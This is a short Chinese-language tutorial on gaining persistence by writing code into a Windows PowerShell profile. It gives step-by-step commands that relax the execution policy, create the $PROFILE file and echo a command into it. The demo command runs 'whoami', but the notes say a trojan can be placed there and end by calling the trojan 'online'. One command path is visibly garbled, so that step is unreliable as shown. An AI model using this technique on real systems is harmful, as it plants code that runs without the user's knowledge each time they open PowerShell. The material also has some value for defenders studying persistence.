持久化-Powershell配置文件持久性

持久化-Powershell配置文件持久性

概述

可以使用Powershell配置文件进行持久性和/或特权升级。

执行

获取可以滥用的powershell配置文件，这取决于你拥有的权限。

$PROFILE | select *

让我们将代码添加到$ profile变量（扩展为当前用户的配置文件）中，该变量将在受感染的用户下次启动Powershell控制台时执行：

PS：
1、如果无法执行ps1脚本，需要用管理员执行Set-ExecutionPolicy Remotesigned
2、echo $profile
3、Test-Path $profile  //如果显示NO需要创建一个，我用初始系统测试默认是没有这个配置文件的
4、New-Item -Path $profile -Type File –Force		//创建配置文件
5、echo "whoami > c:	empwhoami.txt" > $PROFILE		//这里可以把木马写进配置文件中
6、cat $PROFILE		//查看是否写成功，成功会文件内容会显示为你木马路径
7、重启启动一个powershell，木马上线成功

相关资料

https://zhuanlan.zhihu.com/p/108025332